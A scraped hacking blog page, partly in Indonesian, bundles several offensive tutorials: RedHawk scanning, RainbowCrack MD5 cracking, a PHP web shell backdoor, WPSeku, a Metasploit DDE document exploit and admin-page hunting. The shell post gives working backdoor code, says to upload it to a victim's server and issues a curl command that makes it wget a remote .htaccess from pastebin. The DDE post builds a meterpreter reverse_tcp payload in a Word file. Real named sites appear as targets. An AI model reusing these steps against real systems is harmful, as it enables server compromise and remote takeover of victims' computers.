Maxteroit: Script

Redhawk Powerful Information Gathering Tools and Vulnerability Scanning

 

Redhawk, Powerful Information Gathering and Vulnerability Scanning Tools

Ok, in this post, i would like to review powerful tools for Information Gathering and Vulnerability Scanning, its tool called RedHawk , ok let's try it.

#Installing

1. I will use Git Clone methods from GitHub;
use this command :
git clone https://github.com/Tuhinshubhra/RED_HAWK.git
2. Next, enter the directory by command cd .

3. Look at this picture :


there is no permission for executing that file, so we must change mod for the file, use this command :
chmod +x rhawk.php

#Running

1. Command :
php rhawk.php

2.  Ok, after you run this tool, for the first time, you must enter a website domain, for example, i use my domain website www.maxteroit.com :


3. Choose HTTP or HTTPS of that website :


4. And then, Menu tools will be printed :


Ok I will try 1 Scanner, i choose Blogger View Scanner, and the result is :


Just that tutorials from me, and if you find an error in the script, you can ask me in the comment, or mail me [email protected]
Thank's

Redhawk Powerful Information Gathering and Vulnerability Scanning Tools

Crack / Decrypt MD5 Hashes using Rainbow Table

Crack / Decrypt MD5 Hashes using Rainbow Table

Crack / Decrypt MD5 Hashes using Rainbow Table

Hello everyone, in this tutorial, i would like to give method how to crack, encrypt MD5 hashes using rainbow table.

What is Rainbow Table ?

rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a password (or credit card numbers, etc.) up to a certain length consisting of a limited set of characters. It is a practical example of a space–time tradeoff, using less computer processing time and more storage than a brute-force attack which calculates a hash on every attempt, but more processing time and less storage than a simple lookup table with one entry per hash. Use of a key derivation function that employs a salt makes this attack infeasible.
source : Wikipedia

so.. we can conclude what is rainbow table by this image :


Confused ? yha haha same with me, lol.
Alright, you will understand after watching this video :


Let's start

OK, after you read the explanation, watch that video... so it's time to try it.

If you use Windows, choose for Windows,
If you use Linux, choose for windows, hahah i mean Linux
In this tutorial, im using Rainbow Crack for Linux.

2. After Downloaded, unzip the Rainbow and go to that directory, see :


Crack / Decrypt MD5 Hashes using Rainbow Table


Not allow for execute the script ? type this command :
chmod +x rcrack rtgen rtsort

Now we have access to execute that script/program.
Waitt..... before running rtcrack script like that videos, you must have Rainbow Table first :).

Creating Rainbow Tables

Alright, before your create Rainbow Tables, you should see charset.txt, like this one :


Understand it ? must !
numeric                    = [0123456789]
alpha                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
alpha-numeric          = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
loweralpha                = [abcdefghijklmnopqrstuvwxyz]
loweralpha-numeric = [abcdefghijklmnopqrstuvwxyz0123456789]
mixalpha                  = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]
mixalpha-numeric    = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ascii-32-95                  = [ !"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`abcdefghijklmnopqrstuvwxyz{|}~]
ascii-32-65-123-4            = [ !"#$%&'()*+,-./0123456789:;<=>[email protected][\]^_`{|}~]
alpha-numeric-symbol32-space = [[email protected]#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ]
If you are lazy to create Rainbow table (it can take your times and make your computer hot)
you can download from my repository :

https://github.com/maxteroit/RainbowTable-alpha

or clone from my repository, use this command :
git clone https://github.com/maxteroit/RainbowTable-alpha.git 
 After cloning my repo, move all file (exc Readme.md) to directory which you save the Rainbowcrack files.

How to create Rainbow Table ?

Start creating Rainbow Table, use this command :
In here, im creating alpha charset for my rainbow table...
./rtgen md5 alpha 1 7 0 2100 8000000 all
The command means having the md5 hash type , plaintext length range 1 - 7, plaintext total 8353082582.

On process..


You can change plaintext range, plaintext total :).
If it done, you must short the rainbow table first, like this :
./rtsort .


 Ok, after that, run ./rcrack like the video, but wait, provide the md5 hash, or you can use my md5 :
ea1a3df96ef7de460929eecb5c521bad
Let's check in hashkiller.co.uk that my md5 hash :)
and the result is :

Not Found :p

Let's crack with our Rainbow Table and Rainbow Crack :D

Start cracking / decrypting MD5

Use this command :
./rcrack . -h ea1a3df96ef7de460929eecb5c521bad

Andd the result is.... CRACKEDDDD DECRYPTEDDD



Crack / Decrypt MD5 Hashes using Rainbow Table

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1



Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1 - Ebook mengenai Hacking, Programming, Networking & Security sudah bertebaran di Internet, yap seperti di Blog Ini :D Maxteroit tercinta. Berhubungan banyak yang request mengenai Upload Ebook-ebook yang saya punya :'D  (permintaan dari teman FB) , dengan begitu saya dengan senang hati share koleksi-koleksi ebook yang saya punya, berikut screenshotnya :

(GrayHat Hacking-721 pages)


(Practical Reverse Engineering-383 pages)


Nah itu baru secuil aj :D, 
Berikut Nama sekaligus Linknya :














Itulah Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security Part 1 ,
Penasaran dengan 2 Sampel diatas bukan ? 
tunggu di update-an selanjutnya yha, jgn lupa subscribe, atau jika ingin minta langsung, bisa hubungi saya via email =====> [email protected]

Untuk Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 1, segitu dulu yha :'p
thx

Kumpulan Ebook Hacking, Programming, Networking, Blogging & Security 1


Akses Shell, Bukan Download! - Shell Backdoor dalam computer security system ,merujuk kepada mekanisme yang dapat digunakan untuk mengakses sistem, aplikasi, atau jaringan, selain dari mekanisme yang umum digunakan (melalui proses logon atau proses autentikasi lainnya).

Salah satu cara mananamkan shell backdoor pada server adalah dengan metode  JQuery File Upload, tapi pernahkah kalian melakukan cara ini namun saat meng-akses shell, shell backdoor kalian malah ter-download? Oke, kita bahas solusinya.


  • .htaccess
Salah satu penyebab shell malah ter-download adalah htaccess. Apa itu htaccess? .htaccess adalah file untuk merubah beberapa konfigurasi untuk mengarahkan pada web server Apache.

AddType application/octet-stream .php

Lalu bagaimana solusinya? Solusinya adalah me-replace htaccess server dengan htaccess kita sendiri.

Bagaimana caranya??

  • 1. Siapkan file .php berisi script berikut,
<?php passthru($_POST['cmd']); __halt_compiler(); ?>
  • 2. Upload ke server korban.
  • 3. Buka termninal, ketikkan perintah,
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" urlshell
contoh:
curl -d cmd="wget https://pastebin.com/raw/ttPzvDjQ -O .htaccess" http://maxteroit.com/shell.php


  • 4. Upload shell dengan format .berandal > contoh: shell.berandal
Contoh hasil upload:  
https://www.hicinko.com/cruisecms/public/uploadcontent/server/php/files//kecil.berandal

Penutup,
Semua artikel yang dimuat Maxteroit, hanya untuk pembelajaran saja, penggunaan untuk melanggar hukum diluar tanggung jawab Maxteroit. Jika ada kurang jelas atau ada yang ditanyakan, tinggal kan di kolom komentar.

Terima Kasih,
Berandal. 

Akses Shell, Bukan Download!


Cara Install WPSeku Di Termux - Artikel ini saya repost dari Termux Tutorial . Buat kalian yang demen heking heking website tapi gapunya pc/laptop, kali ini dilakukan pada perangkat android . Melalui Aplikasi yg bernama termux . kalian bisa cari di playstore . lalu termux itu apa dan kegunaannya . Saya ambil sedikit kutipan dari official termux.
"Termux is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager"
Ngerti gak? gw gak ngerti ane gan wkwkw.

Pada artikel ini saya akan menjelaskan tentang alat wpseku dan juga saya akan menunjukkan cara menginstal alat wpseku di termux menggunakan android. Alat ini juga bekerja pada perangkat aarch tapi wpscan tidak bekerja pada perangkat aarch.

WPSeku adalah pemindai kerentanan BlackBox WordPress yang bisa digunakan untuk memindai instalasi WordPress jarak jauh untuk menemukan masalah keamanan.

Install WPSeku Di Termux:

Pertama Anda Harus melakukan update dengan command berikut :
$ apt update && apt upgrade -y 
$ apt install git

Lalu ketik :
$ cd WpSeku
$ pkg install python2
$ pip2 install -r requirements.txt
$ python2 wpseku.py -t site.com

Udah gitu aja cara install WPSeku-nya, sangat mudah kan. nantikan update seputar termux lainnya ya yang pastinya banyak tools baru  untuk termux. 

Cara Install WPSeku Di Termux



Maxteroit - Akhir akhir ini telah ditemukan sebuah cara untuk memanfaatkan salah satu fitur yang ada pada Microsoft Windows untuk melakukan suspicous activity. Fitur itu tak lain ialah DDE, kabarnya pula fitur ini telah banyak disalahgunakan untuk menyebarkan malware dan ransomeware.

Sekilas Mengenai Microsoft DDE Vulnerability

DDE ( Dynamic Data Exchange ) merupakan salah satu fitur dalam Microsoft Office yang memungkinkan dua buah aplikasi untuk membagikan data yang sama. Sayangnya beberapa waktu lalu telah ditemukan cara memanfaatkan fitur tersebut untuk melakukan arbitary code execution. Salah satu keunggulan kelemahan ini adalah tak ada pop up warning , tak membutuhkan macros, dan tak memerlukan memory corruption.

Alat Tempur

Langkah-langkah

  • -         Download script dengan perintah

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
  • -         Simpan di

/usr/share/metasploit-framework/modules/exploits/windows/
  • -         Jalankan Metasploit
  • -         Jalankan perintah 

use exploits/windows/dde_delivery

  • -     Setting payload 

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.x.x

set LPORT 4444

  • -         Jalankan exploit
  • -         Copy script yang muncul pada module dan buka VirtualMachine kalian
  • -         Buka Microsoft Word
  • -         Klik tab Insert > Quick Parts > Fields > Ok


  •  -        Klik kanan pada kalimat yang muncul, pilih Toggle Field Code

  • -         Ganti dengan script yang kita dapat dari module


  • -         Save !
  • -         Buka file doc yang telah kita simpan tadi.
  • -         Syarat sah agar exploit ini bekerja adalah si korban harus mengklik yes pada 2 window yang keluar


  • -         Bila berhasil maka, Selamat !!! Kamu Baru Saja Mendapatkan Meterpreter Session!!!


Pencegahan

            Untuk mencegah serangan yang serupa maka kita bisa melakukan hal berikut :

Buka Office Button > Word Options > Advanced > uncheck Update Automatic Link at Opens.


Dan cara yang terampuh ialah jangan pernah membuka file mencurigakan apapun yang kalian dapat dari email maupun sumber lain.



Mengeksploitasi Celah 0day Microsoft DDE Vulnerability

Gambar Hanya Pemanis.

Cara Mencari Halaman Login Admin

Sore gaes, lama juga gw ga nongol, hehe. Jadi pengen peluk kalian semua satu - satu, Unchh.
Kali ini gw balik dengan Tutorial Cara Mencari Halaman Login Admin.

Pernah gak kalian, abis maen SQLi misalnya, user/pass udah dapet, password udah berhasil di decrypt, tapi ganemu Halaman Login Admin? Sering. Nah, disini gw bawain beberapa cara nemuin halaman terkutuk itu :P

1. Havij.
Ya, Havij. Havij ini salah satu alat yang membantu penguji penetrasi untuk mencari dan mengeksploitasi kelemahan SQL Injection pada halaman web. Dan disana ada fitur admin finder nya loh.

Tutorial SQLi dengan Havij


2.  Admin Finder.
Di dunia ini, coba gw tanya, ada berapa tool adminfinder? Banyak :P Kalian bisa gunain salah satu dari mereka. Misal, dari sini. 

3. View Source.
Lahh? Kok View Source? 
Mungkin beberapa dari kalian belum tau ya :P Jadi kita intip2 source code web tadi.  
Lihat contoh ini,


 Disitu bisa kita lihat, sebelum dir uploaded_files , ada dir lagi dengan nama dashboard, kalian tau kan artinya? Wkwk.

4 . Intip Sampai ke Developernya.
Iya, cara ini emang gak umum banget, juga ini ada unsur - unsur factor face biasanya, wkwk.
Kebanyakan web, di bagian footer bakal ada nama developer dari web tadi. Nah, kita intip kesana, yuk gw tunjukin.
1. Target : http://mer99furniture.com/
2. Lihat ke pojok kanan bawah. Disitu tertulis Development by Mobista Technologies.
3. Dari web Mobista Technologies, kita intip - intip lagi. Dan gw nemu, di sini.
4. Kebetulan disana kita bisa lihat demo back-end dari web-web hasil karya Mobista Technologies. Dan salah satunya di sini.
5.Tinggal kita sama kan dengan target pertama, dan .. Gotcha! I got you! Halaman admin target berada di site/ew-admin. Persis seperti demo di web Mobista Technologies.

Mungkin cara terakhir agak rumit karena emang kita masuk banget sampe intip - intip ke web developer nya, hehe. But, Trust Me, it works.

Sekian postingan gw kali ini. Sampe Ketemu di postingan gw selanjutanya.

Cara Mencari Halaman Login Admin

Subscribe Our Newsletter